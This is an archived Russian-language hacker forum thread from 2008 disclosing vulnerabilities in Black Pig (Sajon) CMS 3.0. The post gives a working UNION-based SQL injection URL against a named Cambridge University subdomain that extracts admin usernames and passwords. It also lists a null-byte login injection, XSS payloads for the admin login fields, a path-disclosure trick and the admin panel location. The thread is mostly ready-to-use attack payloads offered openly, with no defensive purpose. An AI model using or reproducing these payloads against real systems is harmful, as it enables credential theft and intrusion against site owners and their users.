ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости Sajon CMS 3.0
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Black Pig (Sajon) CMS 3.0
  #1  
Старый 26.12.2008, 22:08
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию Уязвимости Black Pig (Sajon) CMS 3.0
Наткнулса исследуя Университет Кембриджа:
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.

Sql-inj

1. Имя файла может меняться, но уязвим параметр key
PHP код:
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+FROM+cmscamenter.cms_users-- 
2. Скуля в админке, при авторизации
PHP код:
POST
formloginuser=%00
XSS

PHP код:
http://www.site.com/cms/admin.php
POST
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
Тоже самое в goid,gopage 
Админка:
PHP код:
site.com/cms
Раскрытие пути

PHP код:
http://www.site.com/cms/admin.php
в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ 
PHP код:
Tablecms_users
Fieldsusername,password 
Author: The Black Pig Design Co Ltd
www.blackpig.co.uk

Сорцов нет;аплоад,судя по логам-есть, но я ненашел.
Последний раз редактировалось $n@ke; 26.12.2008 в 23:51.. Причина: да хрен его знает как называеться CMS =)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Reviews CMS w3r3.w01f PHP, PERL, MySQL, JavaScript 33 12.04.2010 23:18
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости 5 13.06.2007 02:07
Mozilla приступила к созданию Firefox 3.0 Dracula4ever Мировые новости 0 31.10.2006 10:29
Девять Комерческих Cms w3r3.w01f PHP, PERL, MySQL, JavaScript 1 21.04.2006 00:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ